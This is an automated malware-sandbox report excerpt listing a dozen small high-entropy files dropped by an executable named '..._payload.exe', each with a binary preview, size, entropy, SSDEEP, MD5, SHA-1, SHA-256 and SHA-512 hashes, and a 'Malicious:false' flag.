                                                                                                Preview:.<?P...*..k..j....!.......f.p..|.k.|...!..U,.._..... ...Y.W|...e.l..d.'z..k.:.D..;.....A...I..2"w.i..a...XM.X...p.'...#..yH>D...A.!1..8...m..u.j....A.^a....1]..t7(}.hDl'.....Bv..*..'=bj.....)N.w.-....MZX..r.]..Q.8..H...':@.',\.Z.&..iS..\....t4...q.!f..C.QUhS..bk....(E....f...... ..s..:P..1......Re.N]t..C..\(.~V..:D...Lq)m....S8`..zU=EB..1Mz.S....-..pA......f.k.a......&.....1B.e..TXb"Lk..o`I..,....o......z.;+.a\.e<.......Y.`.D..o...y.z....IO..f#"....=......~-./#..).|....)}.:Rh~..$.I.zs....ch/a............hG.o....>X...E...d..Z....<.@.WV.0......~.T..`..0^...,......D..>..j]...3t.2.abX.%...N...`..jM....m....).K1..Re..-..."...B...Q.F..._.......F`,39..t.+c/.[i.Xf.9.......Tw]......V...9...F=.:....#'."%t+V..V.[..`I..J,EjJ..-...u.QX.....P(,e`~.....t....:.k@.....L..+?W@._.Y..X)M.....I.K..-..".{t+.....Q.a,.5.~x.`...d.w,.s..6..(*=.P!.<...Q.....k.a.&E6.]?.7Z.E|x0K......o....d..O_I.<e.~.....U.~g5`..!......5[.G......n........".1<><.Y8.&..&
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1708
                                                                                                Entropy (8bit):7.874624404894776
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:rs5LtbUGBR4SnO22zNAbRbwiDtvQY8kLD:rsrBR4aXbhwq+Y8g
                                                                                                MD5:02F8FFA3D5B8A0BE92CE23EEDADC7279
                                                                                                SHA1:CE191CD1747ABA57E3D806D8E2236A4B1865B5F7
                                                                                                SHA-256:E83EF4531159601B4728A751E9021C5F9BC1A28D025390D1BE8B4A8E4D6EA7D1
                                                                                                SHA-512:136B5A7B446E61193635C62465A9C35E10E5A3FC859C15168E87D189694ADC714950DB2CDDF479DF04F008E6009921862CDD3033F4D460220A8FF06FB2A74206
                                                                                                Malicious:false
                                                                                                Preview:.<?...C@mD`.E.^....~.`.13..j.@...Q....k...H.F.t..e...|.(..[....(.L...7.N.......I0E.m..ov....S.......>lz+5...^.A\.6q+Q......R....o.....a..Us.....L.S.M...j......a..8>.O....t..q.....Qn.....D.d..;...H.}.....'.s.c.K.d..4......t....V.d9.&.s6j.\.v.wb?.S./.;."..n3..FJ....>&...2..CY..s_......~...P..B...B.h.Y.0......*g..x........u.=..uH..C..u..3..@.0S. SB...D.-..:.A....m..8P.V.. .....2f.wD..d.|..?.+.n.f1.....\8....O..7...tv..(..*.F.<....2W..n.v. m.I.y=n..aCJ..Nd.I....ELVWI.nX.>i?9...........p..Av.}k..y...bn9...Z!~.&5..%_.(.CRoCJ...G.KY."w.%.........`..t1.@gSj:=..iN..v.Ym..e^.....@.H...Y....).f..~.;WL'.ce..2..+.w=el.0..l.J. 6.8'S.K.Y..#.... .cR..].yB.6..<H.*.......&..@P~.g.f.J.7.....$B..=.>S..r....u.G:8=....7.f.......b.L ..c.`.h6~....(.<W..E......4.(.......;.1$....0..g..T...64_!.>[...*."7,....t..K..:.s..]i.B.}I-..C.TUZ&.6.p....i-.G.q.&.G..!./.&D...Z....e.H....x.W..Dh.....a:5......N.d.3.-}........;...7-..G....<l.#.....H|]..^w......A.%'....n.3.l..>..$1..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1745
                                                                                                Entropy (8bit):7.874931992906153
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:m/+788CNqbmPRzqbamc5k8rqmWx8tbbZkvLuws9a/4vXtt63EfDjICX5x3bD:mM88CXRw05lrqmc8Vejuj9a4Y4DNDLD
                                                                                                MD5:DE60354926AA3C4D8F75FF2E594FA386
                                                                                                SHA1:AD75CC656E42BEA19E9FCE73D5D84ACF4272DEE1
                                                                                                SHA-256:C2D0C816A57E01F415EB05DCDE190D603C05A6CB74F2563D7517027F0AC21FDA
                                                                                                SHA-512:5AF845B24C8C07A999C7F2AE95A827549E0EC5C6CDDD7D6A01FAE4CE5E33253601E7FFB4134482A1E86787BE12AB909B2D1998EA7171298AF6E85A7E2FA09A7E
                                                                                                Malicious:false
                                                                                                Preview:.<?....~..C@P.M..Gl.L.&..w..F/w0..ck.Af.>.]V.q9Dd.,.B...s@..:..\.s......j...9=.....l}9`Td.o.].~.M\37=c..%.neU;8. ye 8........$..../.{?A.yo}...E...f...Fi..Lx3......!...<.0.e!......$..)a._...0I....4..c]......j}...d...[.5Cf.....Y.|Q. ...M..O.^..k.').|.f..$......TCrj.e.w......h.;E.R..`-...8).(A2.".R..?8..k.j.P*....P.y...Q...(.."..Q..e..X.......x..J.....H)z..iP.^...K....YO.).^...i.../..%C.m5.gq ..E...,..`..9.do.J.K.&....G/X...e....zB.Gc0P6Z.....W..O].#....|....._.k......j0......0A.\....]....J.7S.W.....AR.U...&.....W...9z.G...x...8|..7t..~.....\.O.%.....(..]..JC.h...C.....BaN.... .'?....1.F......Z.S.!..i...v....>6..A.D....=7....'..+E..'. ..f.L[.~..$...7m.Llb......+.%o,IP..._.W....9..1v.B...~.Xe.*0.%..(.H...3R[Aa.`q.S.x~.`M....#$\..m...7h......;....[l&..<...!+.*W.@Z4.?......Ki..k..@> 3!..(..aV....d...y.#..{..rO...:E....7....u. .7"...h...R..o.. ..u.].6,.g...87.YX..M...].......E/.(.b\.f....w.1.n...oM...}.l...M....BrD.c.w.2...t.p3r.e..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1702
                                                                                                Entropy (8bit):7.872189806689495
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:iAzGzGdLQICpNrSZtUygzyaQZkc7K4stfvLD:iZGd3CSnzSc+t3
                                                                                                MD5:6A4B8F192C76AE0F5CAB21AF33798269
                                                                                                SHA1:8598DF1BB6BB0FF60341722B9AC7DE2A8CCBC6F5
                                                                                                SHA-256:1BF646293AE26C107F582E3EDBC67D04AE4FDBABCF758D0801DE00736D735CF0
                                                                                                SHA-512:644421346CFF18FCB90AC2F0DFC9851C134179A26850378FF577231872B185D6B5AFD17B00081FD1B91AB1C146D32CFD7E0848CBADB0C497D7F159730F61B4AA
                                                                                                Malicious:false
                                                                                                Preview:.<?..(<.$.)g....J.....a...p...I./J.e.@..Ky..V"7..9.h..H.w$V..#=.....7..[......F.......b...c?f.^!.9#!F#.f0.cg.d.Z...T.N...,..Q+.cmO........y]%..M..$...pfd...Z.@.p.?u..7:.7....].......X....T.o!...3D...)B...,v.Lp..:._.V]...y.......... .._..j...+......Mf.s.z.........,.C&.+..f.L...Y..bc........r..v5b....}...<.{].i..._..I..#pN..wJb~...{!Q$~[.nm./...wX.K..\.^.../Q.*|.l..T...=..........-N....i...F..H..Z.=.d...u.t..!...>.I..w9...N.Q........7.)......(...D.=3.w.A...!..+.&.Q.........4y..fUlu..........u.2.........D4......F.6.."..9...+..4..-...J+[.Z.=......w.9,.j...%...9.R....|...x..U54>.......L...............}.0.z....&w)..L...Jy...I.......W[.~!.5.......4.<?.......@<..9H....d......|...(..E....$.f.+_0]*..8j......6..^...`z...oS....j`..J.....8..e..^&..8...w.:f..g`..k[._........!^.t..d..s..^<.r..-...l.N.=..S_.....A.6..f?gal...n9.X.......M.B..'.U........\.9.d.#h[y.....x.W....\.@.F8..h..46......5w'.....1}.).w.$.w..@...;...HY .)......I.h.[....r.6/...)...^..$
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1739
                                                                                                Entropy (8bit):7.846317929388823
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:qm9LrHVz89fFImPzGj0slAmuJV2+5Fd8qI+mK3jWhxYRV9LD:qmVrHp8hOmP6j0LNVh5Fd9lzWhQVp
                                                                                                MD5:01B84D5DEBAC806EFF2CF35FA34BFE84
                                                                                                SHA1:636F6E7859C0B37610C461DF91E42575E0A9C517
                                                                                                SHA-256:A87B462102790B35EA7D5CED3F67DE1B6BA8FB6FBD51DD708D54FF01EBEBE43F
                                                                                                SHA-512:BD8BECD2571537280725D959038883345084125E9C73835353D8B7C9E2B919504E0EDED9614E7EF1CF1A5CF5AF4B3EECB9CD766B1FD07B46B057E301EEF7AA48
                                                                                                Malicious:false
                                                                                                Preview:.<?.....5.$.F...O....J.."b.....*.n.;..;#...%.P..h..N.qy{....c.J2Eb.R.i`.".'WE..3II\..#bU...t.a..0w..U.....*..b..<.S.....rH.u.m..-E..../.W..S..`.lU.wa...1..Z...(..5.....'...l.!o=...[N.......D.W9<...A.....:y.D0.....04:..g5..e.!.6...?.G|s...i.......>....[eV..k?.....E.x.`..4...=.W[.(.+.......nuy^&.p..=.....0Zi..$.lO.....a..#vwa...5Ye....r..;h.....#"...de......Y.y...-.z..@P.(W.-........m.oZ....G....<...h.n.T..O0UD.u.;_#.P.o\.*RU.domT.-k......n..M.5.z.H....5. .I3.Px.w......X....5..B,.,2.._..7.I...&R....*......J.9!7..V...E...7.g.....?.]O..H?.;.E7..]"..?...*.a+e.|V.{.iQ..y.......]...rf"z...v.V.....B...S.&C...z3...tN.&.Z-..O"..).zhK+......(Z......r.2...2|g..{Q~.&...+....Ue...........89.......i.VN.4*J....*.....)S...\g.?...EBz.#.........>...3..J...G.0.#o.g)...N...[.......N.....K..I.k9..yB..2...;W..4l0.H...zO....*.-*...fn...i`,A../..Hp.2.Qe1]..r.s....^J....4-(.z.s(...Vv......M.b\.W..P..C..V.j..r...L9.RB....&...).L.PxO..)..An*Zz...$.&..f.C.a.W.5M=..I
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1703
                                                                                                Entropy (8bit):7.886240700686943
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ekcWHFwijPdk4NJG7ByJXxeXUBRsPdVloFTQQLD:e9SF04NJG7BwcU/sPdYpV
                                                                                                MD5:D614120921C0787298C39C95D2645A4D
                                                                                                SHA1:AC058D1DDF73C2FE67426C27DAE6509C0D0B1ACA
                                                                                                SHA-256:A694A2BDCD2B692678323E6D0E817250AB7E8CB38B25AEF95F3A84A25BB10E58
                                                                                                SHA-512:6E657E0CAA9E6D043246B072B3607267168F8BC3CD9BD6A3A15A464AAA84FA61EBCB97B01EA31FF224FEC919F4BF04630FF84B8D204C5C15C1FB05B2CA1D852D
                                                                                                Malicious:false
                                                                                                Preview:.<?X....vz`.$w.9.CK...SSm(P..../etJL.8.=`...U.*..Q.L.t...D{&.$ 5.zV..9{...n5.{.Kq%a=....8....X.cB9.X...W jM..2'.7X\.Jw~X$.Aeb-...$.My..F..>.....J{......Hj....?y..W....(.IE......v..~.V..N....{......f{5/..KsO.4j....09(...........b....a......"........O......x....N.be.4#....d.#.U....rW0..ua....e.^;.m........l?R:K........u.....@Y*..H.(..)CME...h.p...o1T...[..t5_..Q.J..j.<v#E|k....X,D.U..AG.)f..n8xH.C.tS.+6..4..A...a..td....L...=..Y...........&8.!.04...-9.0.a..h.....uc..-....(.........^.$.\.64..lh.-.G.e..i..s.....J.a/.....Im....g5.o......+.j...Y=).<.P.H....5.4.yF)+C...?:e\..,.5..waQ..C@....4...Wva...d..56v..7..q..RL!s;.A.fZ.Vq...c.%..@v...&.^.........|......{N.}../siK...t..].F..fO2f...+...*.....w.....2.v......'...-C.h.".y.Uf...w..../..\o-8U....r.A.G...F.......#5.>Q=.u...t.Q$....L/.DR2...-....S.c3..v!.O.)r.L...(g.w3.6.....%.Uq.....c.r.0...h-.;..I.[#W.2m}..,.`.e.g....9..`..#Q.#U.TE...0.;......Z...^'u....B...S..G.&.V9v.....M...0.)b.'.*..I...}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1740
                                                                                                Entropy (8bit):7.8848468194958246
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:3O7LLHVpqGHEoZaay/RWu6LZ0Tg3xj9DOeKrMNg8rkUXJ8P27+4jbWzrX6ziJwNn:3Ov5FTeWuHTYJDOHrq958PYAXPa6yLD
                                                                                                MD5:B6189FD99EB7ADD41944F6B9FCED6CA8
                                                                                                SHA1:BB2F6E75D40A936CF1909403507608D68676E9B0
                                                                                                SHA-256:C19D00AD8FA4B956CA3BA3E9216702E0C3EE871F10000024D2734289C6E30333
                                                                                                SHA-512:801396EB1E8ECDCE85BA8107D5429144BACF42E59987E8110F42EF3CBA041CF97DCA7A5DF890FD3021277DFCA41B4C678B0C572D656E995BDCFEF4583CE0A38B
                                                                                                Malicious:false
                                                                                                Preview:.<?X......Pd......,F.Z}~)G.cZ.u....Q....?<..l..XzVa....x.6Z0r.o..G.._.\Rk77.5....-E...UQmD...h.v..41f!...zj;+......S...&%H..u...P.~.HU..c.L..d.CJ?..=...5.o.jY^...lP..G$I....x..;...,..b..b."...Y.".....y.Kcv.T.\...V....b.1..R.Db...4.....Xt.i.,....=..9.p.#..S..&.7.mgl...."..b........ ..,7..-S.....Uh/... .DU.1....{..\.5....ne.......3.r..J...tlI..>2}..]..`...Y...!?`...g#sQ}.P...i.s.z.SA^`..t'!>...>...o.SN.0.x.?...............?y..K.hk.*....,......9...-..9.(+P..?.....n..b.O.... ...Cebdj.s..#.!........I(...[.h...NQ`......hb..I.~.Tx~.....n...+..B..XXo@Lt.;.w.....|.......@.<..J[.z.h...R../t....N.....-C...B..!.X..NT.sC..`U.(.X.r...,1._*...v.0..........#..@.~.#..n...pl.q....0....R.}\M....MV}.Q...`......a.........I...q;l.2jT0...*.tu...........Jj......H."..aA.2..u...o.. U....[ .tW.gAq..1+Ik..=Z......Z".<......../O..&.s.-.B.C.:...<(..%.o...d..I...uP.<C.R....oZ.K..`.Dw..*2..|.....Q0]..~#].q..p&..j].5.o^.S...U..jQi.%..5....@......w{.....N.=...E..}.&..`.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1725
                                                                                                Entropy (8bit):7.892065139825122
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:SdKw+8BWhsu55xpcMJDGXucuYdj3BhsZr9awdyQ72ICdCLD:1LVP5zpbG+cDNM99bAQ7/+C
                                                                                                MD5:32F18F98DF92D35A6EBC545C9965B7CB
                                                                                                SHA1:C647DA21960BB4668BA78D99A5092B49B2F35DFE
                                                                                                SHA-256:B0F94AE1D22838730FBC319C6C30AB2AC6CB9BBE89DD06161D193DCE7F14FE37
                                                                                                SHA-512:1C332C004C8F2AFBD15AA81CCF07E28050EE07EDE7B29A0A118C70A04EBDF934DCCD97423F6EBC897D98C19EAD2CB558769E7866678440FCDDA17F07194341D4
                                                                                                Malicious:false
                                                                                                Preview:.<?.d..X..?.%`.7.7..6.&o.....`Z2......xw.,...S..R....d.B..v_@.I.&. .......9.......V.o.j...t.|.....OXr!......p}...[.@..S.b....N._*......3....h..... <DG..|bt.<...........E.;$....2>...$....}.\.z.n...^.%7.<\L.3.*..}.......).-6..G......n+.Svk....T).O..%........."?j....D..W.6Y.6r..u....*u}9..1..i..^Y...?...o...?.......{..34................x.X#.>LG?....f..W...j...O.........QY..h.t...4&.....J.U3T.~..4Z....uvD4......|.[.vo...!.z?.T.....!v..m....{"`..2.8.i..{.:..,_(~......73.......}:.R..k..5.N.....* ..p..YX......5F..X. ..?.{.n..z..<...Y.........mq..E...w..=..V.4v.m..j..S..~I..-...e.#...0.e.mz.1.........K.{....[>....I.x..[@qY..xf/4.J..4..]......q..&.J.#./(3.o}..5..fI.~..<..(...&...].)..f.x.a..)...g..-g..R.g...F...K.{.mV...(./....z.#.Q..0.*....W..g..P]..G..1".."..6.n......_.V...!b:sN.q..+S..x6.n.z.K.Hw.....+..hCM.7..Z`..7?\9<9...9 ...Z...r..(!...:...9.....I.4.N....q..........E.!O...........Qh.oH.^...'U.[.......}n.W.=....b|.x....E...5....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1762
                                                                                                Entropy (8bit):7.8637355002612015
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:mOncqqTQ9L1czKxuzqSn9iXty77Lof4fV3ILlJDLD:uqdpSMGof4fRIrr
                                                                                                MD5:C2F34A4F46622A2FB28EC1E05427AFF7
                                                                                                SHA1:FF7701F94CCFCEC60A31C594A64F29A9751BA13A
                                                                                                SHA-256:2642599436987EDB89928ED1B1B1DB5D8985EC4007B295F485C8E8B951A6FA85
                                                                                                SHA-512:4DDB44D57FFAD2795F6492D3AB34230ACAC345DE95315624BA3F50E90D1E44208502089A43671CD5E0F3FF4CDA9703BF99318CB83BC036C9816652AE28E996EF
                                                                                                Malicious:false
                                                                                                Preview:.<?..,.*`%......2Vd.....z.4@Vs...}.....g.)D.fd....z..A,.......~...V..lXH:.m..R........W&....m..i....Xc...N.u...>S...|.q...?.5..kA...D9..|n.;)........ZJ...^.y..."=...r.....?UR.....d.B.F{....j.._..`.U2y7m.....|R.....a9V.VP.b.......}.-...O.g..18..a....#v.9E.*F........`g>.......\.r....-y].-(.......*e3.pk7.../3..y..%..S.W6.......{.U@....O...o..4..A......).....66.].(.w%..L.)u9.3...k......`.fI.j.....Q....5..(..v....d.\..j.0...x\e..0.%|..cg={u.J..cV..+@...6.K..A7...S1.20..B......9t3h...,.......!.....,~.D..3...e.....0f/.....6.!.3.M..Z.u.vVtC...ZKf..G..U.#.Q...*G.\U.L.8...)..|.ro9.F7.......oP.....7A.'V;.:\#.9......Zn...n.]:....)..K...v..m...;.|..+....]}\.....+....8.T..:6...c....k9'.9...-)..K7HI.o,.ok.r..V.\......P.....&...M.-...3e.V....#a.....t*.&......'.8n.x.S....b.Bh.).Ie.7.j...`.E.......U.]:t0M.v.;v.v.7-.}..l.[6X...FC.W.PW{T.%I.#..(..M.....^.E..~.D.@.z.sM._9..5..*t.zI.fb.1...3..xC0.US.o2..W.*Q...E(.#8.u,`h....)E.....]..t...\K...?J.}g.~........
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1690
                                                                                                Entropy (8bit):7.892545770875753
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:jWxouEe1aps5r0J7jGN3+oMa+gCFyn2IZPLD:BuEjps5gUyZgCFyn2Id
                                                                                                MD5:AE8D36A46476061EDB8D3E1AE48D0CF4
                                                                                                SHA1:C0FC0801E09F23A655731FB7D87456C4B1A06750
                                                                                                SHA-256:A2804541500E5227D760A2F848FAB1BDB342C56D4D1B665B1ED253859FA6232D
                                                                                                SHA-512:526981090DA2B8A14B9095E3A66A0CD7CDE295BFA88B3FDDC3BD901111A12408F6C02EDDC2BA98C6D966A4ED3D8376DDE9B63EAB3F7AB8F466CDCD332CC55414
                                                                                                Malicious:false
                                                                                                Preview:.<?.{..^..`b.`....d..f..7....a^ ......f.......Zu..a.c.......;.G.Eko..f..A.@...m.Q...._.&...x+G..I..j..i0......a ..P.!.....l=r..v.Y%...\...c*..6.XJ..mt0.V.....^YE.~/.*(.....p..L..."...3....8d.....{..|t..e..N.y.3..^..<$..7~.(...Y...%(.....O:8.L.`|.....r..9r.[..../I.FoT..f.f..RLh..9....A.V........(..#..T....)~3..[.w\..A,..4\-..i)}\.q..\x^..U...X8...cms.S...:...S..y.yi.#.s.2.q...i,.'....4.T..56v....P../d..qO.....`......6l.b&........4...~..d.d..QP..{..X...g..=`K%.Q..:.......kV.....X.mD.1.T.s.7...i..B..K..W'.c. ..A.-...k'.r.c8.D{.u8......b.`..;.Kh..4.b.......7......:.....D.F..._]"...I^s...q...-...G....%.8...?...n..:.....9..B. ..s...I..t4...kc.[`.C.J1...V,.s..~.......].d....i........... ..N..T!.vG...8.Lp)^..,.'.%. ].l..*).......{d....8.l.MY.3)c..q.T..(l..q.1.V,....3.6.HD~...V.C'......E.pQ.S..`9Q..gA......uT....[.J....U..{.N..@#I......,r.WN..W."..n_...o..~...l.b...za.i..~....vk~?.c..l.......D4.v..h.R..fs.wy....N.....p...m... ....a.x.........
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1727
                                                                                                Entropy (8bit):7.887790933026123
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:X/C7Wp+f+kMcLt9nyqYaQN5MkDMtV99LD:X/F2tYakMdVT
                                                                                                MD5:934AD8CF7D623F58E3134ED695249DF3
                                                                                                SHA1:47E92AD543849B44051F99C784F0BE4B05B2C232
                                                                                                SHA-256:1E7F9952CF96EBD06B49B38F349A59B0B4920D2DE8F5F79E52916B007A7E8280
                                                                                                SHA-512:AB63325FBDDFE7FEAFBE25CCF099FF4769DFAD063A614097304039FC1E2E638E5528375FF030804525AC919E131767EB881B1C5F31C765AF96C4E4C6735717E4
                                                                                                Malicious:false
                                                                                                Preview:.<?(..2..c.VB......-...'M..eI'.....k7.fa3S5.d..).d.Z..Tw....g@.....o?U....C.<".6...]*Z...~..B.'A)....^..EH......{.F.S..9_%.B.Q4-qAJ.pM2.T6q...}:.Z`~l.tN..(..=x. L1.|...T.>G....djv...?.W............3|.6...9}4.z..e.n:.T.K."....H..!..LKh#.I.].o+.z.b.s..K K.........^.M.....}O.B.Y4Z.Y...J.N.D.M........T...1......"..|2.\r..s7(N...E.k^1$..5...=~~).-....5.m..)........*;....ks.-.?.!}...L..7.JD.v.#..c..........<..t/...l~...(.F.............:...Y...m.d..ol.....E.gZ-..V..2.[.r.0.... ..*C.......E..#.......A..f.....9.....[z[kR......m...a.Q...2......f.J.)t..o..M.7Q.m#0....U.P...c.L.....z.!....Y.>ix.Tc...J.../.....a.....P!..k.J7.'ui~.dMU.cF.$.1]...8.....u...).b|.C+U.._o.6....?.v4:....k..Mk....w....*.....9..].8..E.......~96.q....wiI..y../u:.K.o...K.\o......k.CJ;..k.........C.E....&..0....x.....w...?.s... .L`.kv...N.....d..0i.(.....W.p.D...j..y..p..Y..]..{.[A..W..q...3N.1.3..-..=..v...R..1.L. .RL#....{.M.....Q|0......P.X..v.._..z....e.K8.#z]<L...."H
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1708
                                                                                                Entropy (8bit):7.880947190780603
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:7nKorwRaksRcB3SN5vVrSoRqNtcapySQ57NEFUh3FlIskK7ov+fLDckYfmT2Ax3X:e9W63SDhnAXcRc+1Fb7jLDCfdsLD
                                                                                                MD5:DB80EA302DE899AC3E0E93BE1B17A9E3
                                                                                                SHA1:88CCE01B5B4432AE1FD0DDA017BA0736E3C0C942
                                                                                                SHA-256:C6EEAC6A0B23866C71FDF7F81717B1BFEF0AB239C14B69F1B26CBC009BAE5525
                                                                                                SHA-512:AA44BA2A19B77D153837DECCEABE26B88F29BA608B2982C7D3B490A19BE83AD1814F0FD3DC60C1725DDC4ADE9A9785AB1617E66845EB104D0B89AC9AAF0AB5CA
                                                                                                Malicious:false
                                                                                                Preview:.<?sf.$]3...L./.1.Np..A....r.!....y..k@.+)..)J%./..z...*..U^.:n...VEr7.F.....N..ng....$Hm.l.u7.....w...ejvu..5.......o!..f..Q........c..le.m..+....k.S..[.Q ....i..&.]S....7..n3..l..B.j...}.J..K..&.C..p;....c.5c..s..].....:..v..~.|8...DYS.........iO.....3B[ZT.s...H.Ds.}.E]....(k./.PxzQ."..9...~...;bF.}.:B.t.!.....U.i4...i........^.A~..../.t.G_.C.\.S..".=.n]...m.W.U....J.5}..0OD......29n...89..@..l&E..m....T..]..d.n..?..........]..Dx_."...-t..zXdHO2.1..n.x ].7.....*...........]....x......y.}.b..Y.u-.. ....90d.B.@>.....L.GmZ.^O.b...WS....T#-......aFW.|M3....".l.N.t........#...me....a.Q../...}...(.R...?."3=A..z.-..&4.d.....'.F..i......\.N..#!....+....0..<.uJ...'...t./.#.U=q......E.....lfz.P.....Q....,l.O3.G#E...L...^....U.)n|G.I.iSe.._B...%...d.^F'X.......X..(M.B.V..#.y.Z.Ih.q......q......,.Q....dQ.,n...i......$...O....Uz#..1k.j:..o./.WJ.....y#.9.....Nv..5....Z=..o..V.hX..%.i."..h..s.S.f....$.....2.@..e.2...$./5....]Jw......N..r.+EhtMg.@
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1745
                                                                                                Entropy (8bit):7.8937999348014944
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:W2aSEDi+1mDqUPyCDe+yyGeY/VDF120i8XM6zXsJEg1tfC5MlDYXu7LD:W2aSB+xUpe+y2OVxI0iOM6zXMXtfQsDZ
                                                                                                MD5:4E084889083A925EF051FAA1234AAF43
                                                                                                SHA1:3B07C53B10D22592A4CFFB0C89D8C82564F32FDE
                                                                                                SHA-256:931D3D781FB05E90038403179A318F90006974BFFF53B8955EF52B55FEF0CE37
                                                                                                SHA-512:92532386C4BAB3A16557A878A5AF9FBD2E3CCBCF091387134B6C340C05DDD77909D167C2631A2AA017DAAA834BAE436B5BE25A716B7435EDF411792A25F03998
                                                                                                Malicious:false
                                                                                                Preview:.<?CZ..ReS...I...<[.T.8........6....G..V.>.........7...J..).y......F.....b"......8.g...4...kh4...<..5R...a...4.,.{.,NJ...J#m..Y.1....4.S-..{..5If...I,Q.....I.5Pm[.[.....ov...B.L..".iW0...=3j..R......J.....9D>...].....t.X<...........)...'.sG..=..?u..T.....2..k...........wx."|...?.,.x=..f.a.e\...."t!C...\.K.Y6..T.....%../.`.-n...tl.To..i,U._.Z.t.....V...._.k.g.;G.|~dhQj...Q.1.O.../e.ut.3...ut.}[..T.A.B{...U....G..........["......2.G...*lA..^.9.a...Nc..#.[@......B.Ch!e`#.l.....wtv..L.K....` .Eo"..d.m..OEP.~<%.u7.^.q.{.."6.....<F.S....^..q.h.M.,.O........@...[',T|.S..z.W.../......{` D...(|..../+Z.r...1.pO^...4..CB...F..{..:vZ....*....g-T....0.Z....].6...,.P/.IY...F...Z.S2..u.U.m...?.4Lf....P..5.N..{p.>.e)L..=..^.JQ...b...u.k.P.3..KA.....]....r.~#.....Z...HO8G.Y.V}......A.....O..a1.W%...#..R..`.6Tg...Z._Rb...e6..."..}......>....{...JH..P....f.%.4.~k....[ .j.S....q..B.*:...t...2.{....]4.n.j..u..,.............?.d.w.B.6.~zD...9..k.z...+M.x..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1696
                                                                                                Entropy (8bit):7.8713973664335635
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:IjEmaSY/1w0vd1MCvgrepyShhMloYS4vZrWLD:IYmaSY/9vd1MzypnT4vZr+
                                                                                                MD5:E6AFFA03F687094CA859E6F018FADB10
                                                                                                SHA1:39E4789E8F73AA0F25AD8E51BDDBA6E1DE68E9AD
                                                                                                SHA-256:21E1DE8495DBC5DB6A1BCD5508640DC2956A39642A99597C9B2128DDC34706B0
                                                                                                SHA-512:D5D22B8504F19B45C4CAE1BCC9E5615FD8FDB8EDD91FC2F46608B3621F047B47068EC12A57219A847E2EC975F52953792C7C917339537B00CFDF96B0BDA250A0
                                                                                                Malicious:false
